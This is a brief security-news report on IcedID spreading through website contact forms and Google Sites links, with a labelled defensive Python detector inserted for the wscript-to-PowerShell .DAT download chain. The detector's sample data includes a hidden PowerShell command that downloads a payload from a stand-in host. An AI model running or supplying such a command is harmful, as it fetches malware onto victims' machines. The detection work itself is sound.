IcedID Circulates Via Web Forms, Google URLs
Security News, April 2021
Website contact forms and Google URLs are being used to spread the IcedID trojan, according to researchers at Microsoft.
Attackers are using "Contact us" forms on websites to send emails targeting organizations with trumped-up legal threats, researchers said.
The JS file is executed via WScript, and it creates a shell object that in turn launches PowerShell and downloads the IcedID payload in the form of a .DAT file.
"Further analysis reveals that the forms contain malicious sites.google.com links that download the IcedID malware."
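As an added defensive illustration (not code from the article or from the Microsoft research), the Python below scans process-creation events for the chain described above: wscript.exe running a JS file and spawning PowerShell, which then fetches a .DAT file. The event structure, the sample records and the example.invalid URL are all constructed for this example.

```python
"""Flag the wscript.exe -> powershell.exe -> .DAT download chain described
in the IcedID write-up. Events below are constructed Sysmon-style
process-creation records, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str          # full path of the executable
    command_line: str


# PowerShell command lines that pull a remote file and name a .dat target
DAT_DOWNLOAD = re.compile(
    r"(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer|curl)"
    r".*\.dat\b", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_icedid_chains(events):
    """Return (wscript_pid, powershell_pid) pairs where wscript.exe is the direct
    parent of a PowerShell process whose command line downloads a .DAT file."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = by_pid.get(e.parent_pid)
        if parent is None or basename(parent.image) != "wscript.exe":
            continue
        if DAT_DOWNLOAD.search(e.command_line):
            hits.append((parent.pid, e.pid))
    return hits


# Constructed sample: one matching chain plus a benign admin PowerShell run.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\notice.js"'),
    ProcEvent(201, 200, PS, "powershell -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/x','C:\\Temp\\p.dat')\""),
    ProcEvent(300, 100, PS, r"powershell -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for w, p in find_icedid_chains(SAMPLE_EVENTS):
        print(f"suspicious chain: wscript.exe pid {w} -> powershell pid {p}")
```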
The use of contact forms on websites allows the campaign to get around email spam filters, researchers noted, and adds a layer of verisimilitude for recipients.
"The scenarios we observed offer a serious glimpse into how sophisticated attackers' techniques have grown, while maintaining the goal of delivering dangerous malware payloads such as IcedID. Their use of submission forms is notable because the emails don't have the typical marks of malicious messages and are seemingly legitimate."